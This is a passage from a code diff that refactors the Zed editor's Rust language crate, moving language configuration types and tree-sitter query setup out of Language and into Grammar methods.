- pub grammar: Option>, - /// The criteria for matching this language to a given file. - #[serde(flatten)] - pub matcher: LanguageMatcher, - /// List of bracket types in a language. - #[serde(default)] - pub brackets: BracketPairConfig, - /// If set to true, auto indentation uses last non empty line to determine - /// the indentation level for a new line. - #[serde(default = "auto_indent_using_last_non_empty_line_default")] - pub auto_indent_using_last_non_empty_line: bool, - // Whether indentation of pasted content should be adjusted based on the context. - #[serde(default)] - pub auto_indent_on_paste: Option, - /// A regex that is used to determine whether the indentation level should be - /// increased in the following line. - #[serde(default, deserialize_with = "deserialize_regex")] - #[schemars(schema_with = "regex_json_schema")] - pub increase_indent_pattern: Option, - /// A regex that is used to determine whether the indentation level should be - /// decreased in the following line. - #[serde(default, deserialize_with = "deserialize_regex")] - #[schemars(schema_with = "regex_json_schema")] - pub decrease_indent_pattern: Option, - /// A list of rules for decreasing indentation. Each rule pairs a regex with a set of valid - /// "block-starting" tokens. When a line matches a pattern, its indentation is aligned with - /// the most recent line that began with a corresponding token. This enables context-aware - /// outdenting, like aligning an `else` with its `if`. - #[serde(default)] - pub decrease_indent_patterns: Vec, - /// A list of characters that trigger the automatic insertion of a closing - /// bracket when they immediately precede the point where an opening - /// bracket is inserted. - #[serde(default)] - pub autoclose_before: String, - /// A placeholder used internally by Semantic Index. - #[serde(default)] - pub collapsed_placeholder: String, - /// A line comment string that is inserted in e.g. `toggle comments` action. 
- /// A language can have multiple flavours of line comments. All of the provided line comments are - /// used for comment continuations on the next line, but only the first one is used for Editor::ToggleComments. - #[serde(default)] - pub line_comments: Vec>, - /// Delimiters and configuration for recognizing and formatting block comments. - #[serde(default)] - pub block_comment: Option, - /// Delimiters and configuration for recognizing and formatting documentation comments. - #[serde(default, alias = "documentation")] - pub documentation_comment: Option, - /// List markers that are inserted unchanged on newline (e.g., `- `, `* `, `+ `). - #[serde(default)] - pub unordered_list: Vec>, - /// Configuration for ordered lists with auto-incrementing numbers on newline (e.g., `1. ` becomes `2. `). - #[serde(default)] - pub ordered_list: Vec, - /// Configuration for task lists where multiple markers map to a single continuation prefix (e.g., `- [x] ` continues as `- [ ] `). - #[serde(default)] - pub task_list: Option, - /// A list of additional regex patterns that should be treated as prefixes - /// for creating boundaries during rewrapping, ensuring content from one - /// prefixed section doesn't merge with another (e.g., markdown list items). - /// By default, Zed treats as paragraph and comment prefixes as boundaries. - #[serde(default, deserialize_with = "deserialize_regex_vec")] - #[schemars(schema_with = "regex_vec_json_schema")] - pub rewrap_prefixes: Vec, - /// A list of language servers that are allowed to run on subranges of a given language. - #[serde(default)] - pub scope_opt_in_language_servers: Vec, - #[serde(default)] - pub overrides: HashMap, - /// A list of characters that Zed should treat as word characters for the - /// purpose of features that operate on word boundaries, like 'move to next word end' - /// or a whole-word search in buffer search. 
- #[serde(default)] - pub word_characters: HashSet, - /// Whether to indent lines using tab characters, as opposed to multiple - /// spaces. - #[serde(default)] - pub hard_tabs: Option, - /// How many columns a tab should occupy. - #[serde(default)] - #[schemars(range(min = 1, max = 128))] - pub tab_size: Option, - /// How to soft-wrap long lines of text. - #[serde(default)] - pub soft_wrap: Option, - /// When set, selections can be wrapped using prefix/suffix pairs on both sides. - #[serde(default)] - pub wrap_characters: Option, - /// The name of a Prettier parser that will be used for this language when no file path is available. - /// If there's a parser name in the language settings, that will be used instead. - #[serde(default)] - pub prettier_parser_name: Option, - /// If true, this language is only for syntax highlighting via an injection into other - /// languages, but should not appear to the user as a distinct language. - #[serde(default)] - pub hidden: bool, - /// If configured, this language contains JSX style tags, and should support auto-closing of those tags. - #[serde(default)] - pub jsx_tag_auto_close: Option, - /// A list of characters that Zed should treat as word characters for completion queries. - #[serde(default)] - pub completion_query_characters: HashSet, - /// A list of characters that Zed should treat as word characters for linked edit operations. - #[serde(default)] - pub linked_edit_characters: HashSet, - /// A list of preferred debuggers for this language. - #[serde(default)] - pub debuggers: IndexSet, - /// A list of import namespace segments that aren't expected to appear in file paths. For - /// example, "super" and "crate" in Rust. - #[serde(default)] - pub ignored_import_segments: HashSet>, - /// Regular expression that matches substrings to omit from import paths, to make the paths more - /// similar to how they are specified when imported. For example, "/mod\.rs$" or "/__init__\.py$". 
- #[serde(default, deserialize_with = "deserialize_regex")] - #[schemars(schema_with = "regex_json_schema")] - pub import_path_strip_regex: Option, -} - -#[derive(Clone, Debug, Deserialize, Default, JsonSchema)] -pub struct DecreaseIndentConfig { - #[serde(default, deserialize_with = "deserialize_regex")] - #[schemars(schema_with = "regex_json_schema")] - pub pattern: Option, - #[serde(default)] - pub valid_after: Vec, -} - -/// Configuration for continuing ordered lists with auto-incrementing numbers. -#[derive(Clone, Debug, Deserialize, JsonSchema)] -pub struct OrderedListConfig { - /// A regex pattern with a capture group for the number portion (e.g., `(\\d+)\\. `). - pub pattern: String, - /// A format string where `{1}` is replaced with the incremented number (e.g., `{1}. `). - pub format: String, -} - -/// Configuration for continuing task lists on newline. -#[derive(Clone, Debug, Deserialize, JsonSchema)] -pub struct TaskListConfig { - /// The list markers to match (e.g., `- [ ] `, `- [x] `). - pub prefixes: Vec>, - /// The marker to insert when continuing the list on a new line (e.g., `- [ ] `). - pub continuation: Arc, -} - -#[derive(Clone, Debug, Serialize, Deserialize, Default, JsonSchema)] -pub struct LanguageMatcher { - /// Given a list of `LanguageConfig`'s, the language of a file can be determined based on the path extension matching any of the `path_suffixes`. - #[serde(default)] - pub path_suffixes: Vec, - /// A regex pattern that determines whether the language should be assigned to a file or not. - #[serde( - default, - serialize_with = "serialize_regex", - deserialize_with = "deserialize_regex" - )] - #[schemars(schema_with = "regex_json_schema")] - pub first_line_pattern: Option, -} - -/// The configuration for JSX tag auto-closing. 
-#[derive(Clone, Deserialize, JsonSchema, Debug)] -pub struct JsxTagAutoCloseConfig { - /// The name of the node for a opening tag - pub open_tag_node_name: String, - /// The name of the node for an closing tag - pub close_tag_node_name: String, - /// The name of the node for a complete element with children for open and close tags - pub jsx_element_node_name: String, - /// The name of the node found within both opening and closing - /// tags that describes the tag name - pub tag_name_node_name: String, - /// Alternate Node names for tag names. - /// Specifically needed as TSX represents the name in `` - /// as `member_expression` rather than `identifier` as usual - #[serde(default)] - pub tag_name_node_name_alternates: Vec, - /// Some grammars are smart enough to detect a closing tag - /// that is not valid i.e. doesn't match it's corresponding - /// opening tag or does not have a corresponding opening tag - /// This should be set to the name of the node for invalid - /// closing tags if the grammar contains such a node, otherwise - /// detecting already closed tags will not work properly - #[serde(default)] - pub erroneous_close_tag_node_name: Option, - /// See above for erroneous_close_tag_node_name for details - /// This should be set if the node used for the tag name - /// within erroneous closing tags is different from the - /// normal tag name node name - #[serde(default)] - pub erroneous_close_tag_name_node_name: Option, -} - -/// The configuration for block comments for this language. -#[derive(Clone, Debug, JsonSchema, PartialEq)] -pub struct BlockCommentConfig { - /// A start tag of block comment. - pub start: Arc, - /// A end tag of block comment. - pub end: Arc, - /// A character to add as a prefix when a new line is added to a block comment. - pub prefix: Arc, - /// A indent to add for prefix and end line upon new line. 
- #[schemars(range(min = 1, max = 128))] - pub tab_size: u32, -} - -impl<'de> Deserialize<'de> for BlockCommentConfig { - fn deserialize(deserializer: D) -> Result - where - D: Deserializer<'de>, - { - #[derive(Deserialize)] - #[serde(untagged)] - enum BlockCommentConfigHelper { - New { - start: Arc, - end: Arc, - prefix: Arc, - tab_size: u32, - }, - Old([Arc; 2]), - } - - match BlockCommentConfigHelper::deserialize(deserializer)? { - BlockCommentConfigHelper::New { - start, - end, - prefix, - tab_size, - } => Ok(BlockCommentConfig { - start, - end, - prefix, - tab_size, - }), - BlockCommentConfigHelper::Old([start, end]) => Ok(BlockCommentConfig { - start, - end, - prefix: "".into(), - tab_size: 0, - }), - } - } -} - /// Represents a language for the given range. Some languages (e.g. HTML) /// interleave several languages together, thus a single buffer might actually contain /// several nested scopes. @@ -1092,147 +803,6 @@ pub struct LanguageScope { override_id: Option, } -#[derive(Clone, Deserialize, Default, Debug, JsonSchema)] -pub struct LanguageConfigOverride { - #[serde(default)] - pub line_comments: Override>>, - #[serde(default)] - pub block_comment: Override, - #[serde(skip)] - pub disabled_bracket_ixs: Vec, - #[serde(default)] - pub word_characters: Override>, - #[serde(default)] - pub completion_query_characters: Override>, - #[serde(default)] - pub linked_edit_characters: Override>, - #[serde(default)] - pub opt_into_language_servers: Vec, - #[serde(default)] - pub prefer_label_for_snippet: Option, -} - -#[derive(Clone, Deserialize, Debug, Serialize, JsonSchema)] -#[serde(untagged)] -pub enum Override { - Remove { remove: bool }, - Set(T), -} - -impl Default for Override { - fn default() -> Self { - Override::Remove { remove: false } - } -} - -impl Override { - fn as_option<'a>(this: Option<&'a Self>, original: Option<&'a T>) -> Option<&'a T> { - match this { - Some(Self::Set(value)) => Some(value), - Some(Self::Remove { remove: true }) => None, - 
Some(Self::Remove { remove: false }) | None => original, - } - } -} - -impl Default for LanguageConfig { - fn default() -> Self { - Self { - name: LanguageName::new_static(""), - code_fence_block_name: None, - grammar: None, - matcher: LanguageMatcher::default(), - brackets: Default::default(), - auto_indent_using_last_non_empty_line: auto_indent_using_last_non_empty_line_default(), - auto_indent_on_paste: None, - increase_indent_pattern: Default::default(), - decrease_indent_pattern: Default::default(), - decrease_indent_patterns: Default::default(), - autoclose_before: Default::default(), - line_comments: Default::default(), - block_comment: Default::default(), - documentation_comment: Default::default(), - unordered_list: Default::default(), - ordered_list: Default::default(), - task_list: Default::default(), - rewrap_prefixes: Default::default(), - scope_opt_in_language_servers: Default::default(), - overrides: Default::default(), - word_characters: Default::default(), - collapsed_placeholder: Default::default(), - hard_tabs: None, - tab_size: None, - soft_wrap: None, - wrap_characters: None, - prettier_parser_name: None, - hidden: false, - jsx_tag_auto_close: None, - completion_query_characters: Default::default(), - linked_edit_characters: Default::default(), - debuggers: Default::default(), - ignored_import_segments: Default::default(), - import_path_strip_regex: None, - } - } -} - -#[derive(Clone, Debug, Deserialize, JsonSchema)] -pub struct WrapCharactersConfig { - /// Opening token split into a prefix and suffix. The first caret goes - /// after the prefix (i.e., between prefix and suffix). - pub start_prefix: String, - pub start_suffix: String, - /// Closing token split into a prefix and suffix. The second caret goes - /// after the prefix (i.e., between prefix and suffix). 
- pub end_prefix: String, - pub end_suffix: String, -} - -fn auto_indent_using_last_non_empty_line_default() -> bool { - true -} - -fn deserialize_regex<'de, D: Deserializer<'de>>(d: D) -> Result, D::Error> { - let source = Option::::deserialize(d)?; - if let Some(source) = source { - Ok(Some(regex::Regex::new(&source).map_err(de::Error::custom)?)) - } else { - Ok(None) - } -} - -fn regex_json_schema(_: &mut schemars::SchemaGenerator) -> schemars::Schema { - json_schema!({ - "type": "string" - }) -} - -fn serialize_regex(regex: &Option, serializer: S) -> Result -where - S: Serializer, -{ - match regex { - Some(regex) => serializer.serialize_str(regex.as_str()), - None => serializer.serialize_none(), - } -} - -fn deserialize_regex_vec<'de, D: Deserializer<'de>>(d: D) -> Result, D::Error> { - let sources = Vec::::deserialize(d)?; - sources - .into_iter() - .map(|source| regex::Regex::new(&source)) - .collect::>() - .map_err(de::Error::custom) -} - -fn regex_vec_json_schema(_: &mut SchemaGenerator) -> schemars::Schema { - json_schema!({ - "type": "array", - "items": { "type": "string" } - }) -} - #[doc(hidden)] #[cfg(any(test, feature = "test-support"))] pub struct FakeLspAdapter { @@ -1255,79 +825,6 @@ pub struct FakeLspAdapter { >, } -/// Configuration of handling bracket pairs for a given language. -/// -/// This struct includes settings for defining which pairs of characters are considered brackets and -/// also specifies any language-specific scopes where these pairs should be ignored for bracket matching purposes. -#[derive(Clone, Debug, Default, JsonSchema)] -#[schemars(with = "Vec::")] -pub struct BracketPairConfig { - /// A list of character pairs that should be treated as brackets in the context of a given language. - pub pairs: Vec, - /// A list of tree-sitter scopes for which a given bracket should not be active. 
- /// N-th entry in `[Self::disabled_scopes_by_bracket_ix]` contains a list of disabled scopes for an n-th entry in `[Self::pairs]` - pub disabled_scopes_by_bracket_ix: Vec>, -} - -impl BracketPairConfig { - pub fn is_closing_brace(&self, c: char) -> bool { - self.pairs.iter().any(|pair| pair.end.starts_with(c)) - } -} - -#[derive(Deserialize, JsonSchema)] -pub struct BracketPairContent { - #[serde(flatten)] - pub bracket_pair: BracketPair, - #[serde(default)] - pub not_in: Vec, -} - -impl<'de> Deserialize<'de> for BracketPairConfig { - fn deserialize(deserializer: D) -> std::result::Result - where - D: Deserializer<'de>, - { - let result = Vec::::deserialize(deserializer)?; - let (brackets, disabled_scopes_by_bracket_ix) = result - .into_iter() - .map(|entry| (entry.bracket_pair, entry.not_in)) - .unzip(); - - Ok(BracketPairConfig { - pairs: brackets, - disabled_scopes_by_bracket_ix, - }) - } -} - -/// Describes a single bracket pair and how an editor should react to e.g. inserting -/// an opening bracket or to a newline character insertion in between `start` and `end` characters. -#[derive(Clone, Debug, Default, Deserialize, PartialEq, JsonSchema)] -pub struct BracketPair { - /// Starting substring for a bracket. - pub start: String, - /// Ending substring for a bracket. - pub end: String, - /// True if `end` should be automatically inserted right after `start` characters. - pub close: bool, - /// True if selected text should be surrounded by `start` and `end` characters. - #[serde(default = "default_true")] - pub surround: bool, - /// True if an extra newline should be inserted while the cursor is in the middle - /// of that bracket pair. 
- pub newline: bool, -} - -#[derive(Debug, PartialEq, Eq, PartialOrd, Ord, Hash, Clone, Copy)] -pub struct LanguageId(usize); - -impl LanguageId { - pub(crate) fn new() -> Self { - Self(NEXT_LANGUAGE_ID.fetch_add(1, SeqCst)) - } -} - pub struct Language { pub(crate) id: LanguageId, pub(crate) config: LanguageConfig, @@ -1337,184 +834,6 @@ pub struct Language { pub(crate) manifest_name: Option, } -#[derive(Debug, PartialEq, Eq, PartialOrd, Ord, Hash, Clone, Copy)] -pub struct GrammarId(pub usize); - -impl GrammarId { - pub(crate) fn new() -> Self { - Self(NEXT_GRAMMAR_ID.fetch_add(1, SeqCst)) - } -} - -pub struct Grammar { - id: GrammarId, - pub ts_language: tree_sitter::Language, - pub(crate) error_query: Option, - pub highlights_config: Option, - pub(crate) brackets_config: Option, - pub(crate) redactions_config: Option, - pub(crate) runnable_config: Option, - pub(crate) indents_config: Option, - pub outline_config: Option, - pub text_object_config: Option, - pub(crate) injection_config: Option, - pub(crate) override_config: Option, - pub(crate) debug_variables_config: Option, - pub(crate) imports_config: Option, - pub(crate) highlight_map: Mutex, -} - -pub struct HighlightsConfig { - pub query: Query, - pub identifier_capture_indices: Vec, -} - -struct IndentConfig { - query: Query, - indent_capture_ix: u32, - start_capture_ix: Option, - end_capture_ix: Option, - outdent_capture_ix: Option, - suffixed_start_captures: HashMap, -} - -pub struct OutlineConfig { - pub query: Query, - pub item_capture_ix: u32, - pub name_capture_ix: u32, - pub context_capture_ix: Option, - pub extra_context_capture_ix: Option, - pub open_capture_ix: Option, - pub close_capture_ix: Option, - pub annotation_capture_ix: Option, -} - -#[derive(Debug, Clone, Copy, PartialEq)] -pub enum DebuggerTextObject { - Variable, - Scope, -} - -impl DebuggerTextObject { - pub fn from_capture_name(name: &str) -> Option { - match name { - "debug-variable" => Some(DebuggerTextObject::Variable), - 
"debug-scope" => Some(DebuggerTextObject::Scope), - _ => None, - } - } -} - -#[derive(Debug, Clone, Copy, PartialEq)] -pub enum TextObject { - InsideFunction, - AroundFunction, - InsideClass, - AroundClass, - InsideComment, - AroundComment, -} - -impl TextObject { - pub fn from_capture_name(name: &str) -> Option { - match name { - "function.inside" => Some(TextObject::InsideFunction), - "function.around" => Some(TextObject::AroundFunction), - "class.inside" => Some(TextObject::InsideClass), - "class.around" => Some(TextObject::AroundClass), - "comment.inside" => Some(TextObject::InsideComment), - "comment.around" => Some(TextObject::AroundComment), - _ => None, - } - } - - pub fn around(&self) -> Option { - match self { - TextObject::InsideFunction => Some(TextObject::AroundFunction), - TextObject::InsideClass => Some(TextObject::AroundClass), - TextObject::InsideComment => Some(TextObject::AroundComment), - _ => None, - } - } -} - -pub struct TextObjectConfig { - pub query: Query, - pub text_objects_by_capture_ix: Vec<(u32, TextObject)>, -} - -struct InjectionConfig { - query: Query, - content_capture_ix: u32, - language_capture_ix: Option, - patterns: Vec, -} - -struct RedactionConfig { - pub query: Query, - pub redaction_capture_ix: u32, -} - -#[derive(Clone, Debug, PartialEq)] -enum RunnableCapture { - Named(SharedString), - Run, -} - -struct RunnableConfig { - pub query: Query, - /// A mapping from capture indice to capture kind - pub extra_captures: Vec, -} - -struct OverrideConfig { - query: Query, - values: HashMap, -} - -#[derive(Debug)] -struct OverrideEntry { - name: String, - range_is_inclusive: bool, - value: LanguageConfigOverride, -} - -#[derive(Default, Clone)] -struct InjectionPatternConfig { - language: Option>, - combined: bool, -} - -#[derive(Debug)] -struct BracketsConfig { - query: Query, - open_capture_ix: u32, - close_capture_ix: u32, - patterns: Vec, -} - -#[derive(Clone, Debug, Default)] -struct BracketsPatternConfig { - newline_only: 
bool, - rainbow_exclude: bool, -} - -pub struct DebugVariablesConfig { - pub query: Query, - pub objects_by_capture_ix: Vec<(u32, DebuggerTextObject)>, -} - -pub struct ImportsConfig { - pub query: Query, - pub import_ix: u32, - pub name_ix: Option, - pub namespace_ix: Option, - pub source_ix: Option, - pub list_ix: Option, - pub wildcard_ix: Option, - pub alias_ix: Option, -} - impl Language { pub fn new(config: LanguageConfig, ts_language: Option) -> Self { Self::new_with_id(LanguageId::new(), config, ts_language) @@ -1532,25 +851,7 @@ impl Language { Self { id, config, - grammar: ts_language.map(|ts_language| { - Arc::new(Grammar { - id: GrammarId::new(), - highlights_config: None, - brackets_config: None, - outline_config: None, - text_object_config: None, - indents_config: None, - injection_config: None, - override_config: None, - redactions_config: None, - runnable_config: None, - error_query: Query::new(&ts_language, "(ERROR) @error").ok(), - debug_variables_config: None, - imports_config: None, - ts_language, - highlight_map: Default::default(), - }) - }), + grammar: ts_language.map(|ts_language| Arc::new(Grammar::new(ts_language))), context_provider: None, toolchain: None, manifest_name: None, @@ -1573,493 +874,95 @@ impl Language { } pub fn with_queries(mut self, queries: LanguageQueries) -> Result { - if let Some(query) = queries.highlights { - self = self - .with_highlights_query(query.as_ref()) - .context("Error loading highlights query")?; - } - if let Some(query) = queries.brackets { - self = self - .with_brackets_query(query.as_ref()) - .context("Error loading brackets query")?; - } - if let Some(query) = queries.indents { - self = self - .with_indents_query(query.as_ref()) - .context("Error loading indents query")?; - } - if let Some(query) = queries.outline { - self = self - .with_outline_query(query.as_ref()) - .context("Error loading outline query")?; - } - if let Some(query) = queries.injections { - self = self - 
.with_injection_query(query.as_ref()) - .context("Error loading injection query")?; - } - if let Some(query) = queries.overrides { - self = self - .with_override_query(query.as_ref()) - .context("Error loading override query")?; - } - if let Some(query) = queries.redactions { - self = self - .with_redaction_query(query.as_ref()) - .context("Error loading redaction query")?; - } - if let Some(query) = queries.runnables { - self = self - .with_runnable_query(query.as_ref()) - .context("Error loading runnables query")?; - } - if let Some(query) = queries.text_objects { - self = self - .with_text_object_query(query.as_ref()) - .context("Error loading textobject query")?; - } - if let Some(query) = queries.debugger { - self = self - .with_debug_variables_query(query.as_ref()) - .context("Error loading debug variables query")?; - } - if let Some(query) = queries.imports { - self = self - .with_imports_query(query.as_ref()) - .context("Error loading imports query")?; + if let Some(grammar) = self.grammar.take() { + let grammar = + Arc::try_unwrap(grammar).map_err(|_| anyhow::anyhow!("cannot mutate grammar"))?; + let grammar = grammar.with_queries(queries, &mut self.config)?; + self.grammar = Some(Arc::new(grammar)); } Ok(self) } - pub fn with_highlights_query(mut self, source: &str) -> Result { - let grammar = self.grammar_mut()?; - let query = Query::new(&grammar.ts_language, source)?; - - let mut identifier_capture_indices = Vec::new(); - for name in [ - "variable", - "constant", - "constructor", - "function", - "function.method", - "function.method.call", - "function.special", - "property", - "type", - "type.interface", - ] { - identifier_capture_indices.extend(query.capture_index_for_name(name)); - } - - grammar.highlights_config = Some(HighlightsConfig { - query, - identifier_capture_indices, - }); - - Ok(self) + pub fn with_highlights_query(self, source: &str) -> Result { + self.with_grammar_query(|grammar| grammar.with_highlights_query(source)) } - pub fn 
with_runnable_query(mut self, source: &str) -> Result { - let grammar = self.grammar_mut()?; - - let query = Query::new(&grammar.ts_language, source)?; - let extra_captures: Vec<_> = query - .capture_names() - .iter() - .map(|&name| match name { - "run" => RunnableCapture::Run, - name => RunnableCapture::Named(name.to_string().into()), - }) - .collect(); - - grammar.runnable_config = Some(RunnableConfig { - extra_captures, - query, - }); - - Ok(self) + pub fn with_runnable_query(self, source: &str) -> Result { + self.with_grammar_query(|grammar| grammar.with_runnable_query(source)) } - pub fn with_outline_query(mut self, source: &str) -> Result { - let query = Query::new(&self.expect_grammar()?.ts_language, source)?; - let mut item_capture_ix = 0; - let mut name_capture_ix = 0; - let mut context_capture_ix = None; - let mut extra_context_capture_ix = None; - let mut open_capture_ix = None; - let mut close_capture_ix = None; - let mut annotation_capture_ix = None; - if populate_capture_indices( - &query, - &self.config.name, - "outline", - &[], - &mut [ - Capture::Required("item", &mut item_capture_ix), - Capture::Required("name", &mut name_capture_ix), - Capture::Optional("context", &mut context_capture_ix), - Capture::Optional("context.extra", &mut extra_context_capture_ix), - Capture::Optional("open", &mut open_capture_ix), - Capture::Optional("close", &mut close_capture_ix), - Capture::Optional("annotation", &mut annotation_capture_ix), - ], - ) { - self.grammar_mut()?.outline_config = Some(OutlineConfig { - query, - item_capture_ix, - name_capture_ix, - context_capture_ix, - extra_context_capture_ix, - open_capture_ix, - close_capture_ix, - annotation_capture_ix, - }); - } - Ok(self) + pub fn with_outline_query(self, source: &str) -> Result { + self.with_grammar_query_and_name(|grammar, name| grammar.with_outline_query(source, name)) } - pub fn with_text_object_query(mut self, source: &str) -> Result { - let query = 
Query::new(&self.expect_grammar()?.ts_language, source)?; - - let mut text_objects_by_capture_ix = Vec::new(); - for (ix, name) in query.capture_names().iter().enumerate() { - if let Some(text_object) = TextObject::from_capture_name(name) { - text_objects_by_capture_ix.push((ix as u32, text_object)); - } else { - log::warn!( - "unrecognized capture name '{}' in {} textobjects TreeSitter query", - name, - self.config.name, - ); - } - } - - self.grammar_mut()?.text_object_config = Some(TextObjectConfig { - query, - text_objects_by_capture_ix, - }); - Ok(self) + pub fn with_text_object_query(self, source: &str) -> Result { + self.with_grammar_query_and_name(|grammar, name| { + grammar.with_text_object_query(source, name) + }) } - pub fn with_debug_variables_query(mut self, source: &str) -> Result { - let query = Query::new(&self.expect_grammar()?.ts_language, source)?; - - let mut objects_by_capture_ix = Vec::new(); - for (ix, name) in query.capture_names().iter().enumerate() { - if let Some(text_object) = DebuggerTextObject::from_capture_name(name) { - objects_by_capture_ix.push((ix as u32, text_object)); - } else { - log::warn!( - "unrecognized capture name '{}' in {} debugger TreeSitter query", - name, - self.config.name, - ); - } - } - - self.grammar_mut()?.debug_variables_config = Some(DebugVariablesConfig { - query, - objects_by_capture_ix, - }); - Ok(self) + pub fn with_debug_variables_query(self, source: &str) -> Result { + self.with_grammar_query_and_name(|grammar, name| { + grammar.with_debug_variables_query(source, name) + }) } - pub fn with_imports_query(mut self, source: &str) -> Result { - let query = Query::new(&self.expect_grammar()?.ts_language, source)?; - - let mut import_ix = 0; - let mut name_ix = None; - let mut namespace_ix = None; - let mut source_ix = None; - let mut list_ix = None; - let mut wildcard_ix = None; - let mut alias_ix = None; - if populate_capture_indices( - &query, - &self.config.name, - "imports", - &[], - &mut [ - 
Capture::Required("import", &mut import_ix), - Capture::Optional("name", &mut name_ix), - Capture::Optional("namespace", &mut namespace_ix), - Capture::Optional("source", &mut source_ix), - Capture::Optional("list", &mut list_ix), - Capture::Optional("wildcard", &mut wildcard_ix), - Capture::Optional("alias", &mut alias_ix), - ], - ) { - self.grammar_mut()?.imports_config = Some(ImportsConfig { - query, - import_ix, - name_ix, - namespace_ix, - source_ix, - list_ix, - wildcard_ix, - alias_ix, - }); - } - return Ok(self); - } - - pub fn with_brackets_query(mut self, source: &str) -> Result { - let query = Query::new(&self.expect_grammar()?.ts_language, source)?; - let mut open_capture_ix = 0; - let mut close_capture_ix = 0; - if populate_capture_indices( - &query, - &self.config.name, - "brackets", - &[], - &mut [ - Capture::Required("open", &mut open_capture_ix), - Capture::Required("close", &mut close_capture_ix), - ], - ) { - let patterns = (0..query.pattern_count()) - .map(|ix| { - let mut config = BracketsPatternConfig::default(); - for setting in query.property_settings(ix) { - let setting_key = setting.key.as_ref(); - if setting_key == "newline.only" { - config.newline_only = true - } - if setting_key == "rainbow.exclude" { - config.rainbow_exclude = true - } - } - config - }) - .collect(); - self.grammar_mut()?.brackets_config = Some(BracketsConfig { - query, - open_capture_ix, - close_capture_ix, - patterns, - }); - } - Ok(self) + pub fn with_brackets_query(self, source: &str) -> Result { + self.with_grammar_query_and_name(|grammar, name| grammar.with_brackets_query(source, name)) } - pub fn with_indents_query(mut self, source: &str) -> Result { - let query = Query::new(&self.expect_grammar()?.ts_language, source)?; - let mut indent_capture_ix = 0; - let mut start_capture_ix = None; - let mut end_capture_ix = None; - let mut outdent_capture_ix = None; - if populate_capture_indices( - &query, - &self.config.name, - "indents", - &["start."], - &mut [ - 
Capture::Required("indent", &mut indent_capture_ix), - Capture::Optional("start", &mut start_capture_ix), - Capture::Optional("end", &mut end_capture_ix), - Capture::Optional("outdent", &mut outdent_capture_ix), - ], - ) { - let mut suffixed_start_captures = HashMap::default(); - for (ix, name) in query.capture_names().iter().enumerate() { - if let Some(suffix) = name.strip_prefix("start.") { - suffixed_start_captures.insert(ix as u32, suffix.to_owned().into()); - } - } + pub fn with_indents_query(self, source: &str) -> Result { + self.with_grammar_query_and_name(|grammar, name| grammar.with_indents_query(source, name)) + } - self.grammar_mut()?.indents_config = Some(IndentConfig { - query, - indent_capture_ix, - start_capture_ix, - end_capture_ix, - outdent_capture_ix, - suffixed_start_captures, - }); - } - Ok(self) + pub fn with_injection_query(self, source: &str) -> Result { + self.with_grammar_query_and_name(|grammar, name| grammar.with_injection_query(source, name)) } - pub fn with_injection_query(mut self, source: &str) -> Result { - let query = Query::new(&self.expect_grammar()?.ts_language, source)?; - let mut language_capture_ix = None; - let mut injection_language_capture_ix = None; - let mut content_capture_ix = None; - let mut injection_content_capture_ix = None; - if populate_capture_indices( - &query, - &self.config.name, - "injections", - &[], - &mut [ - Capture::Optional("language", &mut language_capture_ix), - Capture::Optional("injection.language", &mut injection_language_capture_ix), - Capture::Optional("content", &mut content_capture_ix), - Capture::Optional("injection.content", &mut injection_content_capture_ix), - ], - ) { - language_capture_ix = match (language_capture_ix, injection_language_capture_ix) { - (None, Some(ix)) => Some(ix), - (Some(_), Some(_)) => { - anyhow::bail!("both language and injection.language captures are present"); - } - _ => language_capture_ix, - }; - content_capture_ix = match (content_capture_ix, 
injection_content_capture_ix) { - (None, Some(ix)) => Some(ix), - (Some(_), Some(_)) => { - anyhow::bail!("both content and injection.content captures are present") - } - _ => content_capture_ix, - }; - let patterns = (0..query.pattern_count()) - .map(|ix| { - let mut config = InjectionPatternConfig::default(); - for setting in query.property_settings(ix) { - match setting.key.as_ref() { - "language" | "injection.language" => { - config.language.clone_from(&setting.value); - } - "combined" | "injection.combined" => { - config.combined = true; - } - _ => {} - } - } - config - }) - .collect(); - if let Some(content_capture_ix) = content_capture_ix { - self.grammar_mut()?.injection_config = Some(InjectionConfig { - query, - language_capture_ix, - content_capture_ix, - patterns, - }); - } else { - log::error!( - "missing required capture in injections {} TreeSitter query: \ - content or injection.content", - &self.config.name, - ); - } + pub fn with_override_query(mut self, source: &str) -> Result { + if let Some(grammar_arc) = self.grammar.take() { + let grammar = Arc::try_unwrap(grammar_arc) + .map_err(|_| anyhow::anyhow!("cannot mutate grammar"))?; + let grammar = grammar.with_override_query( + source, + &self.config.name, + &self.config.overrides, + &mut self.config.brackets, + &self.config.scope_opt_in_language_servers, + )?; + self.grammar = Some(Arc::new(grammar)); } Ok(self) } - pub fn with_override_query(mut self, source: &str) -> anyhow::Result { - let query = Query::new(&self.expect_grammar()?.ts_language, source)?; - - let mut override_configs_by_id = HashMap::default(); - for (ix, mut name) in query.capture_names().iter().copied().enumerate() { - let mut range_is_inclusive = false; - if name.starts_with('_') { - continue; - } - if let Some(prefix) = name.strip_suffix(".inclusive") { - name = prefix; - range_is_inclusive = true; - } - - let value = self.config.overrides.get(name).cloned().unwrap_or_default(); - for server_name in 
&value.opt_into_language_servers { - if !self - .config - .scope_opt_in_language_servers - .contains(server_name) - { - util::debug_panic!( - "Server {server_name:?} has been opted-in by scope {name:?} but has not been marked as an opt-in server" - ); - } - } - - override_configs_by_id.insert( - ix as u32, - OverrideEntry { - name: name.to_string(), - range_is_inclusive, - value, - }, - ); - } - - let referenced_override_names = self.config.overrides.keys().chain( - self.config - .brackets - .disabled_scopes_by_bracket_ix - .iter() - .flatten(), - ); - - for referenced_name in referenced_override_names { - if !override_configs_by_id - .values() - .any(|entry| entry.name == *referenced_name) - { - anyhow::bail!( - "language {:?} has overrides in config not in query: {referenced_name:?}", - self.config.name - ); - } - } + pub fn with_redaction_query(self, source: &str) -> Result { + self.with_grammar_query_and_name(|grammar, name| grammar.with_redaction_query(source, name)) + } - for entry in override_configs_by_id.values_mut() { - entry.value.disabled_bracket_ixs = self - .config - .brackets - .disabled_scopes_by_bracket_ix - .iter() - .enumerate() - .filter_map(|(ix, disabled_scope_names)| { - if disabled_scope_names.contains(&entry.name) { - Some(ix as u16) - } else { - None - } - }) - .collect(); + fn with_grammar_query( + mut self, + build: impl FnOnce(Grammar) -> Result, + ) -> Result { + if let Some(grammar_arc) = self.grammar.take() { + let grammar = Arc::try_unwrap(grammar_arc) + .map_err(|_| anyhow::anyhow!("cannot mutate grammar"))?; + self.grammar = Some(Arc::new(build(grammar)?)); } - - self.config.brackets.disabled_scopes_by_bracket_ix.clear(); - - let grammar = self.grammar_mut()?; - grammar.override_config = 